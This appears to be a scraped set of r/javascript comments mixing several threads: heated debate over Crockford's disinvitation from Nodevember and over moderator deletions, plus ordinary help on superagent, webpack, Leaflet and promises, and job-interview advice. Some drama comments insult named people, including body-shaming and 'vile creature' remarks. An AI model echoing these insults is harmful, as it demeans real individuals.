Well, there is discussing dramatic events, and there is dramatic discussing dramatic events. Sometimes, a discussion about drama becomes highly emotional in its own right. The history of the internet and of society in general is that as the drama increases, a smaller and smaller subset of the community becomes more and more invested in heated arguments about it, while simultaneously a larger and larger subset of the community becomes turned off and disengages. Meanwhile, people from outside the community shy away from it unless they also like drama, and so any growth it experiences is heavily dominated by people to like engaging with drama. Left completely unchecked and unmoderated, the end result is that an online community that never moderates its drama shrinks until it is only inhabited by the most fractious members. That is not necessarily a bad thing in the large, it's pretty much the reason that subreddits like /r/TwoXChromosomes and /r/TheRedPill exist, but if a subreddit explicitly exists to serve a broad community,moderators often have to provide some damping force. --- All that being said, what should be moderated, how often, and so forth are all judgment calls, which is why communities need human moderation.
You have to ask yourself: Is the comment pertinent to the topic? If the answer is yes am not sure what your problem is? Naturally, if the mods decide to delete this thread because it deals with something they wish to exclude from the sub that is up to them, I myself am not defying anyone by posting my opinion on the subject at hand. Or perhaps I am the problem? I don't even know anymore, I'm not even sure what the rules are.
that divide has been resolved for almost a year now. It's a Javascript year, so that's like a 10 years regular time. He surely didn't mean that...
&gt; You have to ask yourself: Is the comment pertinent to the topic? I would say to myself: &gt; When the original post was up, I information `X` about what was and what was not pertinent to this subreddit. And at that time, my comment was entirely consistent with my understanding of `X`. &gt; Now that I see that the post was removed, but somebody has resubmitted it, I have information `X+Y`about what is pertinent to this subreddit. So although my original decision was correct with the information `X` that I had at the time, perhaps a different decision is correct given the information `X+Y`I have now.
[JS drama gives async karma](https://www.reddit.com/r/orlybooks/comments/51eapm/javascript_the_borst_parts/)
&gt;&gt; I was wrong and have been caught red handed, but I won't apologise. PS. he's still harassing, just everyones opinion of what the term refers to is wrong.
I already replied to this. 
&gt; but if a subreddit explicitly exists to serve a broad community I'd add: "or to discuss largely undramatic subject matter like a programming language."
[Forbes] Browser Nightmares: When Anti-Adblockers Effectiveness Goes Too Far 
Sailsjs
I don't even go to forbes anymore, their articles have been getting worse. Then, they just all together stopped me from going to their site through their anti-adblock methods. I'm not whitelisting your shitty site
If you believe the other thread was deleted by moderators who are trying to avoid having a lot of drama on the subreddit at the moment, then no, do not repost the exact same comments. In effect, if everyone just repeats what they already said, you have a group of passionate people undeleting a post the moderators deleted. I'm not arguing with the substance of the post or the comments, but if you think drama over a conference is bad, wait until you have drama over a portion of a subreddit trying to overthrow the actions of the moderators. Moderating is a largely thankless task. Especially for technical subreddits like /r/JavaScript and /r/Programming. I do not believe it is in the subreddit's long-term best interests to force the moderators into playing whack-a-mole with posts and comments, regardless of how passionately we believe in them.
Moderation is one thing, _silently_ dropping a highly upvoted post without explanation leans a lot closer to censorship IMO
&gt; useful idiots for the Right. took you seriously up until you exposed yourself as a hypocrite here.
Wrong subreddit, try /r/shittydramathatisntactualjavascript
What is your client code doing when it gets a 400 bad request? Can you get a header dump? Maybe this can be solved with better fighting :) There is [bell](https://github.com/hapijs/bell) if using hapi. everyauth was a thing for express, but the domain is now for sale and commits look dead. Might still be usable though. 
It's fitting that somebody the size of a planet thinks the world revolves around her, yeah?
The posts that need the most moderation are the ones that are heavily upvoted. The topics that need the most moderation are the ones that attract two, three, four, or more on the front page at the same time. It's like candy: If it didn't taste good, you wouldn't need to exercise restraint around eating it. Same with moderation: It is most important for topics that attract a great deal of interest, but are nevertheless contrary to the spirit and purpose of the subreddit. Let's be very clear: I am a conference speaker. I am very interested in the subject of whether conference speakers can and/or should be uninvited from conferences, and why. I sympathize with many of the opinions expressed, and empathize with many of those I don't agree with. But that doesn't mean that this subreddit is the best place to have those discussions, or that if it might be, that they should dominate the subreddit's front page as they have in the last few days. At the end of the day, someone has to decide if this is "JavaScript," as in anything of interest to people loosely affiliated with using JavaScript, or "JavaScript," as in the language and its use. And regardless of our votes, the people who decide that are the mods. That is their job. Explanation would certainly be nice, and perhaps a pinned post will appear by and by. Until it does, I believe we are well served by supporting their difficult task, not treating them as we have treated the Nodevember organizers. One of the characteristics of enflamed mobs is to treat everyone as the enemy for any slight or difference of opinion. The /r/javascript mods are not our enemy, and we should resit mightily the temptation to be angry with them.
The client is handling an async `LOGIN` action. Here is the requesting code: request .get("/api/login") .type("json") .send(JSON.stringify({username, password})) .end((error, res) =&gt; { if(error) { console.log("Failed to login:", error); dispatch({type: "LOGIN_FAIL", error}); } else { console.log("Logged in!", res); dispatch({type: "LOGIN_SUCCESS", user: res.data}) } }); Here are the headers: Request: GET /api/login HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Type: application/json Accept: */* Referer: http://127.0.0.1:8080/ Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 Cookie: connect.sid=s%3Al-7B52PBl1FEoqjmHs7q4uyphFvz5Z1A.sxHPXm5Ztn6zkUGJVbSS4t9Wd6dL5qN%2B0FLGCHBxu%2B0 Response: HTTP/1.1 400 Bad Request x-powered-by: Express date: Tue, 06 Sep 2016 19:02:38 GMT connection: close content-length: 11
You’re almost entirely having your own conversation now, so I shan’t intrude further. Enjoy.
[?](https://www.reddit.com/r/javascript/comments/50zcet/in_defense_of_douglas_crockford/d7btfy6)
Let's leave the modding up to the mods eh? Having users speculate on why posts or comments where removed seems very counter-productive. If the mods need a mouthpiece I'm sure they'd be happy to notify you if they'd like you to perform that role. From reading the subreddit guidelines, I can't see anything in /u/trakam's comment that violates this subreddit's rules. If you don't care for /u/trakam's comment, then please elaborate on why you feel it's inaccurate, inappropriate, or irrelevant.
Totally agree. You're paying to hear from JavaScript experts, why does it matter who they are or that they mostly come from a specific sex / race / age / background / whatever? As long as they were picked based on merit the calls for diversity are working to undermine their expertise in hopes of propping someone else up
&gt; "I do not care what the mods are trying to accomplish in this subreddit, I shall defy them and do as I please, because I feel strongly about something." Isn't that pretty much how @nodebotanist and whomever else pitchforked Crockford out of the conference approached it? 
&gt; Posts must be related to JavaScript, even if indirectly. Ref: https://www.reddit.com/r/javascript/wiki/index Why remove the original post if it is directly related to the JS community? If they mods want to not have this discussion here, they should amend the subreddit guidelines to be exclusionary to this type of discussion and make it clear what the problems are. As it is, silently killing threads and hoping it will just "go away" without discussion around why isn't a good move to try and make things better in the community.
Without more source I'm guessing here. You don't need to stringify your JSON. Superagent should do that for you. It even could be counterproductive. I use supertest which is based on superagent and never did that. JSON.stringify(JSON.stringify({ a: 1, b: 2})) yields ""{\"a\":1,\"b\":2}"" bodyparser (if you use that in your express server) might trip over that. EDIT: Could you show us the fetch example that fails.
[removed]
For the record, I have no idea why my thread was removed either. I also take umbrage with everyone writing this off as drama. To me if someone's career was negatively affected that's real, it's not "drama." Discussion about the topic is very important for those trying to navigate the culture surrounding a career in JavaScript.
Great intro to promises! Quick question: What is the difference between the solutions in Section 8: 'How do I execute promises in parallel?' and Section 10: 'How do I pass data between non-adjacent promises in the promise chain?'?? In section 8 you have a variable: const getBothHomepagesInParallel which you set equal to the promise returned from: Promise.all([getGoogleHomePage, getBingHomePage]) On the next line (**line 10**), you act on that promise using ```then()```... In section 10 your solution: request.get('http://www.google.com/') .then((res)=&gt; { return Promise.all([res, request.get('http://www.bing.com/')]) }) .then(([resGoogle, resBing])=&gt; { console.log('Bing : ', resBing.text) console.log('Google :', resGoogle.text) }) .catch(err =&gt; console.error(err)) Seems the same to me. The inital promise: request.get('http://www.google.com/') returns a promise that is acted on in the first ```then()``` method. As expected, this ```then()``` also returns a promise, but in the form of: Promise.all([res, request.get('http://www.bing.com/')]) Maybe it's just my inexperience with promises (about 2 weeks) and I know I'm just nitpicking but I was wondering if I am missing something.
One way of getting away from it is to archive http://archive.is/muMSR
When you say that they want to see how you approach does that mean that I would be allowed to look at docs / google something during the interview?
Woops. You're right, the `stringify` is unnecessary. I ended up getting it to work by switching from `get` to `post`. I'm not sure why it works now though considering initially I wasn't stringifying the payload and I was using `post`. I'm guessing the issue was originally caused by the order of my express middleware.
Some places would likely let you look at documents, you could always ask. If you don't know the answer to something, you should say that you don't know (but, perhaps, try to figure out the answer) rather than guess and try to mislead the interviewer that you actually knew the answer. Not knowing everything in detail is often acceptable.
Even if it's literally Hitler i would have no problem learning javascript from him if hes good at js FFS. I want to learn to code all else is bullshit.
My general rule is that I don't really do live coding interviews anymore. I take asking for them as a general red flag. That being said, I think there's a lot of value to collaborative walk through a problem and discuss an approach (maybe even with a bit of pseudocode) as part of an interview, but frankly I'm tired of having to write arbitrary DFS algorithms or re-implement promises with someone judging my every keystroke and utterance - it's nerve wracking and unpleasant.
Hi, thank you for your informative reply. I am now able to run my code, and it seems as though I am calling the plugin correctly. Here is my code: https://jsfiddle.net/z7azrbf2/ My problem is now that I cannot seem to get my easybuttons to work the way I wish. I have tried setting a custom icon and want them when clicked to show one of my grouped layer variables. I'm using this guide: https://github.com/CliffCloud/Leaflet.EasyButton/blob/master/USAGE.md I am able to set up custom icons and my next goal is to place a title next to the icon and be able to turn on and off the icons when pressing the button. 
It'd be nice if we could just ignore these people and focus on JavaScript, but that's not how the world works. Next time it could be you that some hypersensitive ideolgogue deems unfit to attend a conference or have a job. Edit: Also not kidding about the job. [Remember this shit](http://arstechnica.com/tech-policy/2013/03/how-dongle-jokes-got-two-people-fired-and-led-to-ddos-attacks/)? 3 years ago. Do not let this shit quietly fester.
I agree that most people use React that way. It's not *completely* useless in Angular 2, though. Back when Material Design components for Angular 2 were nearly non-existent, I created Angular 2 wrappers for a bunch of Material UI React components and it worked nicely. 
Actually, the interviewer gave me a div, and wrote a function definition that had 4 arguments: string representation of a selector, CSS property to be animated, new value of the CSS prop and the duration. Had 20 minutes to solve this. The biggest problem was mental fatigue after a 2 hour long back to back interviews. 
It depends, I've had some interviewers let me look at docs. But what I meant is they want to see your thought process when solving a problem. So if you are thinking of how to solve the problem I think it helps both parties to explain what you are thinking about. As you revise your approach they can see how you are thinking about solving the problem and maybe even give you hints. 
For example if they ask you to count the occurrences of strings in a text file, you should say: "Ok, well I can iterate through the text file, and construct a dictionary. The strings will be the keys and the number of occurrences will be the values." This way they know exactly what you're thinking of doing, even if your implementation is wrong.
I always explain what I'm doing in any scenario. For instance, that specific scenario might have gone better if you'd said, "I don't know this api, I'm pulling up the docs". Otherwise he will assume you're googling the answer to the problem. I say this as someone who's done 100+ interviews like this -- if they explain what they're doing, I don't care. If they don't tell me anything, and I hear typing, not only do I assume they're googling the answer but I also can't learn from the experience because I don't even know how they're approaching it in the first place. But either way, you have one of two options in that scenario. Ask to look up what the API parameters are and what it does, or ask the interviewer to tell you what the API parameters are and what it does. It's perfectly acceptable to say "I don't know" in an interview, as long as you can prove you know how to learn on the fly. 
I'd also recommend IBM's Strongloop framework, you simply define "Models" and it creates Mongo DB object and CRUD API endpoint as for them. Quick way of writing an Express server and super cool!
Only comment worth a damn in this whole thread.
I had no clue where this linked to. I started reading and realized it was someone of the opposite (not the reddit majority) side of things. I expected actual accusations and reasons for not talking about them earlier. But instead more of "I don't like him". Shortly after Jacob Appelbaum. I just hope every conference ever is exclusive of trolls like this MxKasPerch person. It's just sickening.
No problem, the source you posted is definitely missing some of your JS and obviously your HTML though. Post at least a full set of your example code and where you're specifically encountering an issue. As far as making a custom icon respond to a click event goes, are you familiar with listeners? In particular, you can add on onclick event by using JS to query your appropriate selector and then adding an event listener. e.g. https://jsfiddle.net/24guu1w1/. So with this in mind, you just need to register the click event and then have it respond accordingly to show your corresponding layer.
I think the word "nodevember" is extremely offensive.
&gt; I hereby retract any statement that implicitly or explicitly calls Douglas Crockford (who is still rude and a jerk) a harasser ~~Um, it was more than just that, but whatever. [@nexxylove](https://twitter.com/nexxylove/status/772211150108758016) "The reaction that we're seeing to the Nodevember Un-Invitation Incident™ is one born of fear for repercussions of toxic behavior. Full stop."~~ ~~Thanks nexxy. For your apology, I hereby retract any statement that implicitly or explicitly calls 'Emily a rose' hypocritical (but she's still hypocritical and should be uninvited from events). All water under the bridge really, glad things are settled.~~ Wow. Thanks for fact-checking me there. Embarrassed.
Definitely in agreement here, though nothing posted thus far has to the best of my interpretation been in conflict with the subreddit's stated guidelines. Let's hope the mods can clear up why posts were deleted. Regardless of the reason though, we need to keep the discussion respectful. Modding is often a thankless and difficult job, especially when it comes to controversial subjects like this one. We're all here because we love and/or love to hate the weird beast that is javascript and the community that surrounds it. Ideally we're all on the same team here. I think we all want everyone to be treated fairly and with respect, we all want everyone's opinions to be heard, and we all want mistakes to be acknowledged so that we can learn from them. I would however be careful that we don't apply blanket blame on the subreddit as a whole for any mistreatment of the Nodevember organizers, or any other individuals. I'd like to think, on the whole, we're mostly rational and amiable folks here. If a few people have perhaps gotten a bit carried away and started brandishing pitchforks, let's address those individuals as individuals. A major source of fuel for these drama fires is simply the use of blanket statements e.g. "SJWs", "redditors", "brogrammers", "alt-right", "unique snowflakes". The less we treat people as individuals and assign blame, praise, or attributes to groups instead of individuals, the more people feel slighted or elevated due to the actions of people who have virtually nothing to do with them. This is confusing at best, and dangerous, ignorant, and deceptive in practice. All this to say: I didn't treat the Nodevember organizers badly, neither did you. So let's not use "we". Let's refer to those people as individuals and hold those **individuals** accountable for their toxic behavior.
It's a good trick to learn how to think out loud. For example, with the Angular question, I'd be saying to the interviewer something along the lines of: - Well it's going to use dirty checking - You can implement dirty checking with a flag - If the flag is set, then the framework will re-render it - The flag would get set whenever something changes - That could be set automatically with observables, or manually if necessary - Any subcomponents would also need to be checked in a recursive manner Full disclaimer, I know almost nothing about Angular. I vaguely remembered the key word of 'observables', and I know about some of the vague concepts of dirty flags, so I collect these ideas, and run through them logically in my head, making it very clear to the interviewer what I'm think about at each point. Most interviewers will provide some sort of feedback, so lean on that in terms of working out where to go and where to come from. Tbh, thinking aloud is a good habit to get into in a number of situations - e.g. when programming with other people.
Vue.js is compact, straightforward and very well-documented. It is almost a spiritual successor to knockout.js and Angular 1, and has a very pragmatic design approach. Give it a go.
Mostly just made an ass out of herself. In this case there were no real consequences. The conference might be tarnished but I think they'll still get enough attendees despite this. The quality of speakers might diminish (who wants to risk it) Have been incidents were people have been fired etc in the past over similar trivialities..
I think they meant to name it "no devs ever"
Almost all subs have been infiltrated by SJWs. Want to guess if this one is an exception?
this whole debacle just keeps getting more and more ridiculous... 
The hypocrisy of these people knows no bounds. This "Mx Perch" is a vile creature.
I refactored it a little more.
No ember devs. 
React is quite the contrary. You are composing re-usable components, what's there to make it verbose? Bringing state in (for instance via Redux) looks a bit scary in most tutorials, causing a myriad of distributed files and folders. You can just as well keep a unified store. With React the concept is what appears to be verbose. I looked over other peoples projects and had no idea what's going on. Once the first steps were made it is actually straight forward. The [Egghead React fundamentals course](https://egghead.io/courses/react-fundamentals) is pretty good at giving you that perspective.
 maximum call stack size exceeded
An opinion by any other interface would sound as sweet. Let's force all presenters to speak through a robot with voice modulation!
Couple things; you should exclude folders (like node_modules) when compiling. How long is your build time? Secondly, when you run your webpack build in node, are you getting compiling errors or are you just not getting the expect output file in the location you anticipated? A missing output file is deriving 100% from your webpack config (otherwise you should simply see build errors both in a webpack hot-load setup and/or when you attempt to simply build your webpack). Here's what I use to just build out a webpack =&gt; babel / es6 setup. Also, you don't have any presets, which seems off to me. module.exports = { entry: __dirname + '/src/js/index.js', output: { path: __dirname + '/src/', filename: 'index.min.js' }, module: { loaders: [ { test: /.jsx?$/, loader: 'babel-loader', exclude: '/node_modules', query: { presets: ['es2015'] } } ] }, plugins: [ new webpack.DefinePlugin({ 'process.env': { 'NODE_ENV': JSON.stringify('development') } }) ] } If you need help with getting this setup, this tutorial helped me wrap my head around webpack + react a while back:https://www.youtube.com/watch?v=MhkGQAoc7bc
Thank you for your answer and notes. The reason I added several DIVs inside the `map` DIV (which is `container` DIV in my example) is because I create the SVGs programatically and insert them into each of those sub DIVs of `container`. I found the solution to my problem by increasing the size of the `container` DIV from 10x10 px to something larger.
Sounds a lot like the minimongo part of Meteor. Neat.
https://www.dreamfactory.com
And why I'm the hell does different religions need to be represented? I just have no words.
I wish it were a webpack issue. I removed a bunch from the webpack.config I posted so as to make it easier to read for folks. I have the presets and the node_modules excluded. Build time is about 2 seconds, and it outputs the appropriate bundle.js file! (Thanks for the tip, their videos have helped me in the past.)
I really hope everybody learns something from this implosion. Crockford could stand to change some things about his demeanor if he wants people to like him; Perch needs to learn to work with people she doesn't like. Conference organizers and other large organizations need to learn that a little bad PR on twitter isn't always as bad as the bad PR you'll get if you make a knee-jerk reaction. But who am I kidding? Everybody directly involved in this situation has probably already made up their mind about everybody else being a jerk.
I guess if Crockford was (initially) going it was a somewhat important event? Or does he literally go to every js related conference?
&gt;Regarding the diversity in keynotes, I personally reached out to the following speakers of diversity I would hope he means diverse topics and nothing else. Anything else shouldn't be the topic or bother of technical conferences. I also believe that, if a code of conduct, with a list of elements as those in that post, is needed, I would not want to belong to or attend any such event. Their focus is not on the target. They're distracted by people with their own issues and I certainly don't want to be bothered. I have my own problems and enough to do.
&gt; ngular2 (which is in a quasi-beta stage right now) is made to be used with TypeScript, so that may also be a good starting point for Yup, I'm actually learning TypeScript right now, with [this gitbook](https://www.gitbook.com/book/basarat/typescript). But I really want to master a JS Framework. My goal for the next month is to develop a web app like Noisly with Angular 2 and make it native for Android &amp; iOS with NativeScript or Ionic. 
We use it for our custom payload decompression on the client side. We have a custom websocket protocol and it ties into a legacy system that does gzipping. You are correct, there are very few use cases for this. With websocket's per-message deflate and http requests content-encoding support, it is very niche.
Probably my bad, I realize I wrote "not finding" in the title. But yeah, the issue is it's not being served. Varying attempts to serve the static content haven't worked, though they have in the past ( such as the one you mentioned, or the one I mentioned in my reply to /u/mmm493 ) 
That's /u/nexxy, the apology was from @nodebotanist
The relative (display) of where the content is falling on your screen is based on how you chose to style the elements. In other words, almost all browsers will display elements as block style and render elements in a first-come-first-appear order. However, styling elements (e.g. either inline or through a CSS), can change the order as the developer sees fit. Nonetheless, the source HTML will always look the same though; e.g. console.log(document.querySelector('#someDiv').innerHTML); will always return the same "order" of items, no matter how they have been styled. This means you can rely on the idea that document.querySelector('#someDiv svg:nth-child(1)'); will always return the first child, etc.
1st of all get used to this type of treatment. Software engineering is terrible in that nothing you've done in the past or worked on matters. You'll get this till you move onto another field. Part of the problem is we flooded the market with people that can do things, but doesn't necessarily mean they do them right or well. Thats part of the reason they ask you these fundamental questions and this is what you should focus on. If you say you worked with a framework, understand the fundamentals and not just how to do something. Practice these stupid code questions like on hackerrank. best of luck
infamy
I just looked up compression on websockets and it looks like there is no native compression support and it makes sense to use pako. Thanks!
This is very accurate. React is great for architecting your own framework but it just doesn't "do it all". AngularJS, emberJS, and backbone provide everything you need. React just provides one layer, the others either need to be written or supplemented with other third party libraries.
Because it is absolutely ridiculous.
&gt; I hereby retract any statement that implicitly or explicitly calls Douglas Crockford (who is still rude and a jerk) a harasser This represents a complete lack of maturity or professional decorum. Doesn't Perch usually focus on topics of community and inclusiveness in her talks? Because she certainly doesn't seem to be a qualified speaker on the topic if this is how she gets along with her coworkers.
understanding the basics of how a framework you claimed to use doesn't seem so ridiculous to me. Based on this SO response, it seems pretty reasonable to me to ask. http://stackoverflow.com/questions/35469024/how-does-angular-2-change-detection-work 
Screw questions like these. Most of these aren't real world scenarios of what you'd be doing on a day-to-day basis. I don't disagree with testing peoples' knowledge, but test them on stuff that is fairly common in the day-to-day workflow. I'm not sure what's more frightening, these questions or the fact that I just got a job a few weeks ago as lead developer without showing them one line of code. Most employers have no idea what they're doing.
Oh I know there is no way you can win with rating yourself 1-10. I mean context is extremely important, is a 10 like being Douglas Crockford or is it relative to the community at large? Also it really depends on how modest someone is as well, the best programmers I know like to highlight what they don't know, while over confident idiots are common as well. Say you're at a 9 and they will think of you as a cocky fool. Be modest and say 7 and they will think "Oh he must really be terrible"!
[deleted] ^^^^^^^^^^^^^^^^0.21772194362020358 &gt; This comment has been overwritten by [this open source script](https://greasyfork.org/en/scripts/10380-reddit-overwrite) to protect this user&amp;apos;s privacy. The purpose of this script is to help protect users from doxing, stalking, and harassment. It also helps prevent mods from profiling and censoring. &gt; If you would like to protect yourself, add the Chrome extension [TamperMonkey](https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo), or the Firefox extension [GreaseMonkey](https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) and click Install This Script on [the script](https://greasyfork.org/en/scripts/10380-reddit-overwrite) page. Then to delete your comments, simply click on your username on Reddit, go to the comments tab, scroll down as far as possible (hint: use [RES](http://www.redditenhancementsuite.com/)), and hit the new OVERWRITE button at the top.
Yeah especially for a Framework like Angular looking under the hood and decomposing the abstractions is a guarantee, because unexpected behavior is abound! 
&gt; TL;DR I lied and defamed a man because I don't like his attitude. I was wrong and have been caught red handed, but I won't apologise. additional TL;DR: I'm a hopeless narcissist and I wish I was as passionate about tech as I am about throwing people under the bus to further my cause against current-year social injustices. 
But why not just straight out ask how comfortable they are with Javascript? There's nothing wrong with that. Phrasing it as "rate yourself out of ten" is a bit weird. A lot of people would feel uncomfortable giving themselves a high rating, even if they feel they know JS inside out. (sorry, only just saw the reply below that says pretty much the same thing. I'd give myself 3/10 as a reddit user)
while this whole nodevember drama bothers me and makes me think about things like the bigger picture of this community, if Doug Crockford doesn't give a damn (based on no one except Paul Straw hearing from him), maybe we should move on, too
I doubt that was the actual question, if it's Angular 1 we're talking about then dirty checking isn't really the answer as to how it implements two-way binding and the question was more than likely asking about how the digest cycle. Which is a pretty up-front part of the framework that most people using it have had to learn and use.
A good engineer can pick up something like Angular or React in a week or two because their focus is well-beyond the specifics of one library over another. Foolish on their part. "Sorry, you may be a master carpenter, but you have no experience with DeWalt tools. We only use DeWalt tools." 
Ha and of course she just disabled comments on this article. Guess she couldn't take the heat.
No, you shouldn't curry something just because you can. I think the argument here is it has benefits that aren't being tapped into by the majority of lodash/underscore users. Ramda, for example, automatically curried because there was a need for them. Here's what [someone's view](http://fr.umio.us/favoring-curry/) on what that has to offer is. For more examples of why chaining falls short, [here's another article](https://medium.com/making-internets/why-using-chain-is-a-mistake-9bc1f80d51ba#.6c09cyl80) with examples. I wouldn't get too hung up on the examples themselves but the concept they're getting across.
Can we just go back to accepting talks because they sound helpful or informative for the attendees? What a mess we've become.
That is a hurtful, pathetic thing to say. Let's discuss what people do, not their appearance.
I've been responsible for hiring quite a few developers over the years and I've never tested a single one of them with this sort of irrelevant pop quiz-ish fuckery. Hi how are you, this is what we do, these are the technologies we use, these are some of the problems we deal with on a regular basis and this is what we're looking for someone to do for us. Have you had experience with the technologies we use before? Why did you choose to use them? How long have you worked with them? What kind of issues have you faced trying to solve similar problems with the same or at least similar technologies? If you haven't used these technologies but have used similar ones do you know the differences and can you explain why you'd choose one over the other? Can you show me some code examples of work you've done thats **RELEVANT** to the type of code you'll be writing for us? If you can't gauge someones skill level based on these questions and a trial period, then you don't belong in the hiring process. Any seasoned developer knows that you can't just continually store useless information in your head, I've been coding for ten years and I constantly re-reference information because I have other more important things to remember on a daily basis.
I've only been to two conferences - CSS Con and Crop (a design conference) - and that was only because they were in my hometown(s). Neither one of these taught me much of anything, so I have been assuming the real reason to go to these is to network, hob knob and perhaps meet some friends. But if this is how the JS community is, I think I'll just begin to skip these things altogether. If these are supposed to be about professional development, nothing screams unprofessional more than an inability to perform your tasks because you don't like someone else on your team.
They made a blunder but they don't deserve my idiocy.
Seriously. I'm mostly on the interviewer side of these things these days and I could not care less if someone used google to figure something out. I might get mildly peeved if they just pasted code into the fiddle, though. This all just points up that networking and keeping contact with former bosses and coworkers pays out great dividends. Pretty much all my jobs past the first couple have been people I know poaching me away from my current job. Interviews are usually "lets have lunch and see how you mesh with the rest of the team" affairs.
[removed]
Hi /u/SocJusTard, please keep it civil. Thanks.
Heh. Yeah. I'm way ahead of you. I've been logging this shit for months. Not my first rodeo, unfortunately. But your point about using gender-neutral language is good.
Don't mean to be offensive but honestly I think this is something that bothers you, but I think most are okay with it. Just try to keep in mind that it's just a question for me to gauge a good starting point for questioning, and has no bearing on my opinion on how well you know js.
i don't like your tone, reported for harassment
That's a shame. I know of conferences that have not been destroyed by socially-stunted imbeciles in this way. I continue to speak at them. I am reasonably confident that any such attempt will be shut down by individuals who are not persuaded by any social penalty of doing so. Maybe you should come.
Yeah I guess it's not too bad in person. But if it's through email or taleo it's tricky because you can't elaborate. 
&gt; I wouldn't get too hung up on the examples themselves but the concept they're getting across. I understand the concept. What's missing is a demonstration of how it can be useful in real life. For once what I'd like to see in one of these articles is an example of currying being genuinely useful. In that most recent article you linked to, the author seems to use unnecessarily verbose code to make non-currying seem worse than it really is. This is the author's non-curried example: .then(function(tasks) { var results = []; for (var i = 0, len = tasks.length; i &lt; len; i++) { if (tasks[i].username == membername) { results.push(tasks[i]); } } return results; }) But that's unnecessarily and perhaps even deliberately verbose. This is what it actually should have been: .then(tasks =&gt; tasks.filter(task =&gt; task.username == membername)) Now his curried example doesn't look like such a big deal anymore: .then(R.filter(R.propEq('username', membername))) It turns out it wasn't actually currying that made his example shorter, since the non-curried example is just as short. What really made the code shorter, more than anything else, is the filter function.
The ones that are really excluded are the poor, who can't pay to attend.
Indeed. Dont forget that these hyper-sensitivie SJWs are developer relations at Salesforce and Auth0 respectively, not small companies.. 
The internet is getting weird. People seem to be losing self-awareness. The irony here is painful.
My 2 cents is that hopefully SJWs don't need anyone's help to lose credibility. They are short-sighted idiots, they are harmful to good causes and we should politely give them reality checks.
Everyone else is doing that already. Figured someone had to call her a gravity well at some point.
Late to this, but I wanted to reassure you, that interview was utter crap on *their* part, not on yours. No programmer can - or should be expected to - function that way. They were basically treating you like you ought to have all JavaScript syntax and best-practice patterns memorized. What they *should* have been assessing is how well you use the tools of a programmer (your workspace, reference material, and even how efficiently you Google are important here), how flexible you are (could you happily switch from Angular to something else you've never even heard of without batting an eye if the project needed you to), how interested you are in keeping your skills up to date (ES6, for example), the quality of code you write (do you break things up into useful and reusable components or write gigantic monolithic functions?), and so on. How quickly you can churn out a bunch of lines of code should be the *last* thing they worry about.
Holy crap, really?!? That's absurd, and I guarantee you dodged a bullet.
What an awful interview process. Why would you make someone reinvent the wheel?
Dale Carnegie? Sounds like a sexist shitlord. That book is oppressive. 
It's slam poetry dressed up as a technical talk.
If your target div has several svg roots in it, like &lt;div&gt; &lt;svg&gt;&lt;svg&gt; &lt;svg&gt;&lt;svg&gt; &lt;/div&gt; and you want to get the positioned-as-in-HTML svg and output it to another svg (or to PDF, say, from SVG -&gt; PDF), then, no. I'm not sure what the rules are for putting multiple &lt;svg&gt; root elements into another SVG file, but If that's possible, I suppose you could query the DOM and get the relative positiotns/sizes of the svg elements and then push that through as transforms on the resulting output SVG, using &lt;g&gt; elements and the transform attribute. But that's a lot of work.
Misandry is an issue and I think people are overlooking this. I've had several jobs where women were the "dominant pack" and let me tell you, they were the worst. Even some more chill women would talk about this toxicity. I've never met guys that would make similar remarks or who would create a hostile environment such as that was. Now we have this whole absurd SJW, PC, Tumblr, movement and it infiltrates the workforce. It's simply toxic and unprofessional. Look, if there is a guy who is obviously being a prick and makes the workplace hostile then there should be punishment, but why does someone like Perch gets a free pass? And I've seen plenty of the same people personality wise, it's not good. Honestly, if I knew a person like her is going to work or is working at the place I am considering, then I will let it go, it's not worth it. These type of people create more problems than they solve, they thrive on drama. 
Worth a watch "My Opinion On Douglas Crockford Nodevember Fiasco" https://www.youtube.com/watch?v=YsMXw_Vcz5A End spoiler: Flame away you social justice fuckers
[Hypocrite.](https://youtu.be/tBRGMcdAKzs?t=17m16s)
Drama from the nodejs community? Unheard of!
Glad to have helped even a little bit. I wish you luck.
What are you talking about now? You're swapping topics like it's going out of style. 
Pretty much this. I don't work as a developer and broke at the moment, but would love to attend and hang out and just be part of the community. Obviously can't do that. Some conferences have those "opportunity grants", but I am a white male (first gen immigrant too, so I am not quite ballin here), which makes me out of the question for the grant since I am not LGBT, woman, black or hispanic. One day, one day I'll break into the field and will be able to attend, until then, YouTube it is. 
Make your own promise lib. You got 20 minutes. No pressure...;) 
Sounds incredibly toxic. Any reason you haven't just started looking for a new job? I understand if you are 'married' to the project, we've all been there... but it reaches a certain stress level when it's not worth it.
Two words: stock options. And damn good ones. Otherwise I'd be gone in a heartbeat.
So, basically gonna double down on being an overly sensitive prick. When you take someone else's words, and attribute meanings to them that the speaker did not intend, there's a word for that. It's called "slander", and it's actually a crime in some circumstances. 
That's a great piece of Node.JS article.
"Meh-he-co", I think. ;-) 
Correct. Can someone please link me to a time when this rude jerk publically called someone out? . . . didn't think so.
You know what DC probably did? shrugged his shoulders **and went back to writing.** What did this person do? Self-righteously and referentially continue to dwell. Having seen this person on video, I know exactly they kind of person we're dealing with here.
Mexico.
Exactly my thoughts. It's a relative scale. I don't know if I'm a 10, if I don't know what 10 is...
yeah, imo, you're being too hard on yourself. those are all questions that evaluate your knowledge, not your intellect or abilities. being a great developer (as i'm sure you know) is much more about the ability to learn new things, not how many js trivia you know. keep doing interviews, it's the best way to get good at interviews!
Oh I'm getting there. Believe me. This is getting pretty bad. My next big payoff is in a few months, and then I'll re-evaluate.
I could have done CSS animation in my dreams, but the interviewer specifically asked me for JS based animation. 
Definitely not crazy. First, Eric Elliot likes to sit above us in his kingdom and tell us why we're all using X concept incorrectly. Second, JavaScript is a piss-poor language to do functional programming in, as evidenced by the dependencies and reliance on non-FP syntax. In a language like F#, his original code looks like this: myList |&gt; join('-') |&gt; map (fun s -&gt; s.toLowerCase()) |&gt; split(' ') |&gt; encodeURIComponent No need for calls to methods like `curry` or `reduceRight` or pulling in large dependencies. It's just part of the language syntax.
When you say you had to write your "own implementation" of a Promise, do you mean that they wanted you to program an ES6 Promise or they wanted you to create something like a Promise polyfill that uses your own code without employing the ES6 Promise API?
